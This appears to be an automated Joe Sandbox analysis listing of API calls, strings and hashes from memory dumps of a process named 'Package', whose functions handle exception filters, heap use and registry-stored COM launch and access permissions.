                                                                          • Opcode ID: 868bbb758c6d957a3039e987fba2fa0bceb481faa8c9c184b4a7f77874279614
                                                                          • Instruction ID: ea41c7dcef20c191bff5c982c76c1585f1691b95a77f711f03075fb2dd4e819c
                                                                          • Opcode Fuzzy Hash: 868bbb758c6d957a3039e987fba2fa0bceb481faa8c9c184b4a7f77874279614
                                                                          • Instruction Fuzzy Hash: 78110379D01708ABCB10DFB8E94969EBBF4FF59311F65486AE402E7314E7319B808B60
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E2F1871
                                                                          • IsDebuggerPresent.KERNEL32 ref: 6E2F193D
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E2F1956
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6E2F1960
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: dc1d44efaea059b5675f3217e85a11a1c4c440e93a7873ae778449fa5cc4dd4e
                                                                          • Instruction ID: f5043e1d5035fa2be3c6e3f754e58153c9da9c637aaf912d832d74659ee83631
                                                                          • Opcode Fuzzy Hash: dc1d44efaea059b5675f3217e85a11a1c4c440e93a7873ae778449fa5cc4dd4e
                                                                          • Instruction Fuzzy Hash: 4731F4B5D4121DDBEF20DFA0D9497CDBBB8AF08304F1045AAE40DAB244E7719A85CF44
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D3F602,00D29E34), ref: 00D3F4D3
                                                                          • UnhandledExceptionFilter.KERNEL32(00D3F602,?,00D3F602,00D29E34), ref: 00D3F4DC
                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,00D3F602,00D29E34), ref: 00D3F4E7
                                                                          • TerminateProcess.KERNEL32(00000000,?,00D3F602,00D29E34), ref: 00D3F4EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                          • String ID:
                                                                          • API String ID: 3231755760-0
                                                                          • Opcode ID: 5497a1b483d57b49d58c0a9cb8bf5c3e5348ca042869c8e78f8c717384fd9161
                                                                          • Instruction ID: 7a91414a500de18b9c86c484fdf7d04dd833d51b2436e911b725c2b6134e970a
                                                                          • Opcode Fuzzy Hash: 5497a1b483d57b49d58c0a9cb8bf5c3e5348ca042869c8e78f8c717384fd9161
                                                                          • Instruction Fuzzy Hash: 73D0CA3A000308ABCB002FE1EC0EB4D3E28EBAA216F064400F30AE3624DA3188C18B71
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E2F540A
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E2F5414
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E2F5421
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: f99ae7631f66527d7e277960767ef1733075aadf863ec9d6706a1148503cada5
                                                                          • Instruction ID: 2a772fa2211b4eecff716ebd67e53c1097ce4ce754a5a380a5cf11fc2955958b
                                                                          • Opcode Fuzzy Hash: f99ae7631f66527d7e277960767ef1733075aadf863ec9d6706a1148503cada5
                                                                          • Instruction Fuzzy Hash: A131C1B594122DDBCB21DF64D8887C9BBB9BF08310F5045EAE41CA7260EB709B85CF44
                                                                          APIs
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,0000000C,00000000,0000000C,00000001,?,00000000,00000001,?,?,00D3BA07,System,00000001,00000000), ref: 00D3C7E2
                                                                          • GetLastError.KERNEL32(?,00D3BA07,System,00000001,00000000), ref: 00D3C7EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: DaclDescriptorErrorLastSecurity
                                                                          • String ID:
                                                                          • API String ID: 914054853-0
                                                                          • Opcode ID: 3a471d384490837d4742fb9b5658ab570af4f6bcbb0a067d5127f794798805bb
                                                                          • Instruction ID: d6e69c33d3e76d8c2283031c65534fe770b54742c2e40d62e389e6cf79823416
                                                                          • Opcode Fuzzy Hash: 3a471d384490837d4742fb9b5658ab570af4f6bcbb0a067d5127f794798805bb
                                                                          • Instruction Fuzzy Hash: 26F08C3761023ABBDB211A959C45F46BB29EF407B4F114122FE04EB250DA63DC2087F0
                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E2FE130,?,?,00000008,?,?,6E2FDD33,00000000), ref: 6E2FE362
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: 42aa50bfc78c4a0870ae84f11cba075d1addef07fbdb4b3fff58d36140f9a632
                                                                          • Instruction ID: caf70c41af6ec8858d4fcdc9224af06bf356aee9f3d29834a58ec8779ceed6f0
                                                                          • Opcode Fuzzy Hash: 42aa50bfc78c4a0870ae84f11cba075d1addef07fbdb4b3fff58d36140f9a632
                                                                          • Instruction Fuzzy Hash: 29B19E3115060ECFD706CF68C496B65BBE2FF05365F258658E8A9CF2A1C735E982CB40
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E2F1A3E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor
                                                                          • String ID:
                                                                          • API String ID: 2325560087-0
                                                                          • Opcode ID: 8a6c7c06a13a57daa56283f8eceac06b826dfa64fe7e17b5862f6a785bd04dd0
                                                                          • Instruction ID: 29791322ab762d295bd74c4196e8bbc8c071c88b15aac87dfe4aef1a3a549412
                                                                          • Opcode Fuzzy Hash: 8a6c7c06a13a57daa56283f8eceac06b826dfa64fe7e17b5862f6a785bd04dd0
                                                                          • Instruction Fuzzy Hash: 3851D8F1A6460ACFEB44CFA4C4913AEBBF6FB09301F20816AC402EB245E7709985CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4910fb9fa291ebda4c08f029d9e1047edc619c9284fa67529ebf3fbe78c47106
                                                                          • Instruction ID: 2f424c4f53d7282956a64c7164746621e9204b7afb726c18279d18b9c4526af6
                                                                          • Opcode Fuzzy Hash: 4910fb9fa291ebda4c08f029d9e1047edc619c9284fa67529ebf3fbe78c47106
                                                                          • Instruction Fuzzy Hash: 6341A2B585421DAFDB108FA8CCD8AEAFBBAEF45304F1442D9E41993200DA319E458F60
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001FA70), ref: 00D3FAC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 8f64c9acc2bbb23b9e85ff0fd13a4d20f488d73efd6d9318c143c19461cffc5d
                                                                          • Instruction ID: 62ef9e3a5582528c1ae595f25d476342509a80cd7edbe1920142f4abfa4988e2
                                                                          • Opcode Fuzzy Hash: 8f64c9acc2bbb23b9e85ff0fd13a4d20f488d73efd6d9318c143c19461cffc5d
                                                                          • Instruction Fuzzy Hash: 2D9002A86917084B46005BB05C0990525905A59616B424460A086D5168EB5080C86531
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardOpen
                                                                          • String ID:
                                                                          • API String ID: 2793039342-0
                                                                          • Opcode ID: 30c57c19e72b51e41de015a71ab190c52471ff5b463b2643a636d128af2300e7
                                                                          • Instruction ID: 9ff702837fedf187627b4fd00a585219f749cffe3e140514a60d9e01dc20d390
                                                                          • Opcode Fuzzy Hash: 30c57c19e72b51e41de015a71ab190c52471ff5b463b2643a636d128af2300e7
                                                                          • Instruction Fuzzy Hash: 9C9002754101408BCE015F10ED085043B31FB46306320019490558D53187325463DA50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 906b5d4bea00f885895d482c134a2008858e9b61eeace53f9a1a248ed0ac692b
                                                                          • Instruction ID: 173aa4e27b98eee763d54164e97381008e3fbeab1f989e8de43e1c5979854420
                                                                          • Opcode Fuzzy Hash: 906b5d4bea00f885895d482c134a2008858e9b61eeace53f9a1a248ed0ac692b
                                                                          • Instruction Fuzzy Hash: 92A00270551501CB6B445F35990930A359975465E1715C15D9406C6154E6644550DF25
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D3C0C6
                                                                          • #540.MFC42U(00000488,00D2C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 00D3C0F1
                                                                          • RegOpenKeyExW.ADVAPI32 ref: 00D3C112
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C13A
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3C151
                                                                          • #800.MFC42U ref: 00D3C15F
                                                                          • malloc.MSVCRT ref: 00D3C174
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3C18D
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D3C1B4
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3C1C2
                                                                          • free.MSVCRT ref: 00D3C1CD
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(00000000,?,?,?), ref: 00D3C1EC
                                                                          • GetLastError.KERNEL32 ref: 00D3C1F6
                                                                          • #2810.MFC42U(?,Everyone), ref: 00D3C21C
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D3C250
                                                                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00D3C283
                                                                          • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D3C29A
                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00D3C2CA
                                                                          • free.MSVCRT ref: 00D3C2D1
                                                                          • GetAce.ADVAPI32(00000000,00000000,?), ref: 00D3C2EB
                                                                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00D3C350
                                                                          • #2810.MFC42U(?,%s\%s,?,?), ref: 00D3C374
                                                                          • #2810.MFC42U(?,?? Unknown Account ??), ref: 00D3C38A
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D3C3BE
                                                                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00D3C3F5
                                                                          • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D3C40C
                                                                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00D3C47D
                                                                          • #2810.MFC42U(?,%s\%s,?,?), ref: 00D3C4A1
                                                                          • #2810.MFC42U(?,?? Unknown Account ??), ref: 00D3C4B7
                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D3C4EB
                                                                          • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00D3C522
                                                                          • SendMessageW.USER32(?,00001053,000000FF,00000002), ref: 00D3C539
                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00D3C569
                                                                          • #3993.MFC42U(00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 00D3C57F
                                                                          • GetAce.ADVAPI32(00000000,00000001,?,00000001,00000000,?? Unknown ACE ??,00000000,00000000,00000000,00000000), ref: 00D3C593
                                                                          • GetLastError.KERNEL32 ref: 00D3C5AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#2810$Close$AccountErrorLastLookupQueryValuefree$#3993#540#800DaclDescriptorH_prolog3_OpenSecuritymalloc
                                                                          • String ID: %s\%s$?? Unknown ACE ??$?? Unknown Account ??$Everyone$Yes
                                                                          • API String ID: 47226287-2762826609
                                                                          • Opcode ID: 4bbd6f3e4d35d1b85f5e406380de5e6fba5fbf943d98fe2c637420e40e73118f
                                                                          • Instruction ID: 8b5253bffea500fea40ff4ccc2e2a2221228ab222a4a655caee95b80cb0b6a88
                                                                          • Opcode Fuzzy Hash: 4bbd6f3e4d35d1b85f5e406380de5e6fba5fbf943d98fe2c637420e40e73118f
                                                                          • Instruction Fuzzy Hash: 32D1EDF590062C9FDB208F50DC84AEAB7BCEB49314F5045E9E649A2291DB709EC49F74
                                                                          APIs
                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00D31877
                                                                          • #540.MFC42U(00000058,00D2B66A), ref: 00D31884
                                                                          • #540.MFC42U(00000058,00D2B66A), ref: 00D31891
                                                                          • #540.MFC42U(00000058,00D2B66A), ref: 00D3189F
                                                                          • #4155.MFC42U(00000004,00000058,00D2B66A), ref: 00D318AD
                                                                          • #4155.MFC42U(00000005,00000004,00000058,00D2B66A), ref: 00D318B7
                                                                          • #3517.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0,00000005), ref: 00D318DE
                                                                          • #858.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0), ref: 00D318EB
                                                                          • #800.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0), ref: 00D318F7
                                                                          • #2910.MFC42U(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31910
                                                                            • Part of subcall function 00D3DB5F: isspace.MSVCRT ref: 00D3DB7C
                                                                            • Part of subcall function 00D3DB5F: isxdigit.MSVCRT ref: 00D3DBF6
                                                                            • Part of subcall function 00D3DB5F: isspace.MSVCRT ref: 00D3DC2E
                                                                            • Part of subcall function 00D3DB5F: isspace.MSVCRT ref: 00D3DC49
                                                                            • Part of subcall function 00D3DB5F: isdigit.MSVCRT ref: 00D3DBCD
                                                                            • Part of subcall function 00D3DB5F: isdigit.MSVCRT ref: 00D3DC1A
                                                                            • Part of subcall function 00D3DB5F: toupper.MSVCRT ref: 00D3DBE3
                                                                          • #5906.MFC42U(00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A67
                                                                          • #6205.MFC42U(?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A80
                                                                          • #6205.MFC42U(?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A92
                                                                          • #6191.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31A9D
                                                                          • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31AA7
                                                                          • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31AAF
                                                                          • #800.MFC42U(0000002C,?,?,00000001,?,?,00000001,00000000,00000000,00000000,000000FF,00000000,?,?), ref: 00D31AB7
                                                                          • #1258.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D221A0), ref: 00D31B1E
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D31B2B
                                                                          • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B35
                                                                          • #540.MFC42U(00000044,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D31B41
                                                                          • #4155.MFC42U(00000004,00000044,00000000,?,?), ref: 00D31B4F
                                                                          • #4155.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B59
                                                                          • #540.MFC42U(00000005,00000004,00000044,00000000,?,?), ref: 00D31B61
                                                                          • #3865.MFC42U(?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B77
                                                                          • #2970.MFC42U(00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B8C
                                                                          • #2910.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31B99
                                                                          • #3792.MFC42U(000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BA6
                                                                          • #3792.MFC42U(00000000,000000FF,00000000,?,?,?,00000005,00000004,00000044,00000000,?,?), ref: 00D31BB8
                                                                          • wsprintfW.USER32 ref: 00D31BE8
                                                                          • #5568.MFC42U(000000FF), ref: 00D31BF6
                                                                          • #6399.MFC42U(?,?,?,000000FF), ref: 00D31C09
                                                                          • #800.MFC42U(?,?,?,000000FF), ref: 00D31C11
                                                                          • #800.MFC42U(?,?,?,000000FF), ref: 00D31C19
                                                                          • #800.MFC42U(?,?,?,000000FF), ref: 00D31C21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#540$#4155$isspace$#2910#3792#6205isdigit$#1258#2970#3517#3865#5568#5906#6191#6399#858H_prolog3_H_prolog3_catch_isxdigittoupperwsprintf
                                                                          • String ID: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d, %d$,$,
                                                                          • API String ID: 708604890-3364495680
                                                                          • Opcode ID: 56d4700e46b0d9a5f7e0bc41718dc90916c134c918b001bfe7c748cd5d9eb62f
                                                                          • Instruction ID: 50795ee37bddf4396ce3ba35c9fd08c6d85eff7f73ffa1b310dbf988601caa35
                                                                          • Opcode Fuzzy Hash: 56d4700e46b0d9a5f7e0bc41718dc90916c134c918b001bfe7c748cd5d9eb62f
                                                                          • Instruction Fuzzy Hash: B3A1B471D0020DAACF11EFE0D985ADDFBBAEF18300F54452AE155A7192EB746A4ACF70
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D304BA
                                                                            • Part of subcall function 00D3D0B6: StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00D3D152
                                                                            • Part of subcall function 00D3D0B6: lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00D3D163
                                                                            • Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D179
                                                                            • Part of subcall function 00D3D0B6: RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D3D1AA
                                                                            • Part of subcall function 00D3D0B6: RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00D3D25C
                                                                            • Part of subcall function 00D3D0B6: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D270
                                                                            • Part of subcall function 00D3D0B6: wsprintfW.USER32 ref: 00D3D286
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D304E6
                                                                          • SetCursor.USER32(00000000), ref: 00D304ED
                                                                            • Part of subcall function 00D3DE06: malloc.MSVCRT ref: 00D3DE1E
                                                                          • #538.MFC42U(new CSecurityDescriptor failed.), ref: 00D30528
                                                                          • #800.MFC42U(?,00000000,MakeSelfRelativeSD failed), ref: 00D30754
                                                                            • Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE45
                                                                            • Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE55
                                                                            • Part of subcall function 00D3CDEB: free.MSVCRT ref: 00D3CE6D
                                                                          • #538.MFC42U(00000000,00000000), ref: 00D30575
                                                                          • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?,Interactive,00000001,Administrators,00000001,System,00000001,00000000), ref: 00D305BC
                                                                          • malloc.MSVCRT ref: 00D305C8
                                                                          • #538.MFC42U(00000000), ref: 00D305F5
                                                                          • MakeSelfRelativeSD.ADVAPI32(00000000,00000000,?), ref: 00D30610
                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 00D30659
                                                                          • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00D30666
                                                                          • RegSetValueExW.ADVAPI32(?,LaunchPermission,00000000,00000003,?,00000000), ref: 00D3067C
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D30688
                                                                          • free.MSVCRT ref: 00D3068F
                                                                          • #2634.MFC42U(00000001), ref: 00D306B9
                                                                          • #2634.MFC42U(00000001,00000001), ref: 00D306C6
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D306D9
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D306E9
                                                                          • #5977.MFC42U ref: 00D306F2
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D306FD
                                                                          • SetCursor.USER32(00000000), ref: 00D30704
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursorfree$#538$#2634CloseLoadMakeMessageOpenRelativeSelfSendmallocwsprintf$#5977#800DescriptorEnumFromH_prolog3_LengthSecurityStringValuelstrcpy
                                                                          • String ID: Administrators$CSecurityDescriptor::Initialize failed.$Interactive$LaunchPermission$MakeSelfRelativeSD failed$System$new CSecurityDescriptor failed.$psdSelfRelative malloc failed.
                                                                          • API String ID: 3894545846-2955734171
                                                                          • Opcode ID: 7374e3f0ceef582e5d2e01eb4d5e69815e5068e14098c8740cf462b003122d1e
                                                                          • Instruction ID: 463dc14cf64f0ab53fd1be057185de0d7c42998f2322ae6e1f3aa36c52989dca
                                                                          • Opcode Fuzzy Hash: 7374e3f0ceef582e5d2e01eb4d5e69815e5068e14098c8740cf462b003122d1e
